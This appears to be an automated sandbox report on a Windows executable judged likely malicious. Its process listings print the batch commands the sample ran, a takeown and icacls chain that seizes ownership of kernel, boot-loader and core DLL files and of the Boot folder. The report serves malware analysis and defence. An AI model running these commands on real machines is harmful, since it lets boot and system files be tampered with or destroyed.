Analysis Overview
SHA256
454ca1ab51dcd5f7b5654eeec763e8d45278d1f7a2ba48db0c8ffc52831bfd84
Threat Level: Likely malicious
The file 1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-02 20:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 20:14
Reported
2024-07-02 20:16
Platform
win7-20240508-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Boot\DVD\EFI\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\de-DE\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\es-ES\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\etfsboot.com | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\en-US\efisys.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\fr-FR\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\it-IT\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\ja-JP\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2EAE.tmp\2EBF.tmp\2EC0.bat C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntoskrnl.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Windows\Boot"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\Boot" /t /c /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\bfsvc.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\bfsvc.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\SHELL.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\SHELL.DLL" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\kernel32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\kernel32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\advapi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\advapi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\user32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\user32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\gdi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\gdi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\win32k.sys"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\win32k.sys" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntdll.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntdll.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ANSI.SYS"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ANSI.SYS" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\hall.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\hal.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Users\Public"
C:\Windows\system32\icacls.exe
ICACLS "C:\Users\Public" /t /c /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl"C:\Windows\System32\AdvencedInstallers"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\AdvencedInstallers" /t /c /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\Boot\winload.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\Boot\winload.exe" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\avicap.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\avicap.dll" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\COMMDLG.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\COMMDLG.DLL" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\keyboard.drv"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\keyboard.drv" /grant Admin:F
Network
Files
C:\Users\Admin\AppData\Local\Temp\2EAE.tmp\2EBF.tmp\2EC0.bat
| MD5 | 411b15479e88b188dc741f7f83eda07e |
| SHA1 | 1c2d076c497dd21f31d6cfb839fe809c6374ab70 |
| SHA256 | e1e7b274e80ebb009eacd476eb942a18dc4540bf2100d12009c73b64200d981a |
| SHA512 | fe3eea4ceeecaa279e46ebf29fa44814154083c9ba56f0591a4c399021075bfabd51a075ba5cbaa331a26d20958035bc45ec0badd0adc02ad1f0e8f1346e2a94 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-02 20:14
Reported
2024-07-02 20:16
Platform
win10v2004-20240508-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Boot\PCAT\et-EE\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\ru-RU\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\cs-CZ\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fi-FI\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\hu-HU\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\tr-TR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\cht_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\de-DE\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\segoen_slboot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\msjhn_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\hr-HR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\chs_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\ja-JP\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\zh-TW\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fi-FI\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_02_1af4.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\el-GR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fr-FR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\nl-NL\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\zh-CN\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\en-GB\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-US\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\et-EE\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\zh-TW\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\kor_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\malgun_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\es-ES\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Resources\fr-FR\bootres.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-US\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\nb-NO\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pl-PL\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pt-PT\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\el-GR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ru-RU\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\it-IT\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Resources\ja-JP\bootres.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\it-IT\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\fr-FR\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\es-ES\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\sr-Latn-RS\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\en-US\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\fi-FI\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\en-US\efisys.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_07_1415.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\zh-TW\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_02_8086.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ja-JP\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ko-KR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\cs-CZ\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\de-DE\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\qps-ploc\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\fr-FR\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\en-US\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\msyhn_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\nl-NL\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pt-BR\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-GB\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pt-BR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pt-PT\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pl-PL\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\winsipolicy.p7b | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\519A.tmp\519B.tmp\519C.bat C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntoskrnl.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Windows\Boot"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\Boot" /t /c /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\bfsvc.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\bfsvc.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\SHELL.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\SHELL.DLL" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\kernel32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\kernel32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\advapi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\advapi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\user32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\user32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\gdi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\gdi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\win32k.sys"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\win32k.sys" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntdll.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntdll.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ANSI.SYS"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ANSI.SYS" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\hall.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\hal.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Users\Public"
C:\Windows\system32\icacls.exe
ICACLS "C:\Users\Public" /t /c /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl"C:\Windows\System32\AdvencedInstallers"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\AdvencedInstallers" /t /c /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\Boot\winload.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\Boot\winload.exe" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\avicap.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\avicap.dll" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\COMMDLG.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\COMMDLG.DLL" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\keyboard.drv"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\keyboard.drv" /grant Admin:F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\519A.tmp\519B.tmp\519C.bat
| MD5 | 411b15479e88b188dc741f7f83eda07e |
| SHA1 | 1c2d076c497dd21f31d6cfb839fe809c6374ab70 |
| SHA256 | e1e7b274e80ebb009eacd476eb942a18dc4540bf2100d12009c73b64200d981a |
| SHA512 | fe3eea4ceeecaa279e46ebf29fa44814154083c9ba56f0591a4c399021075bfabd51a075ba5cbaa331a26d20958035bc45ec0badd0adc02ad1f0e8f1346e2a94 |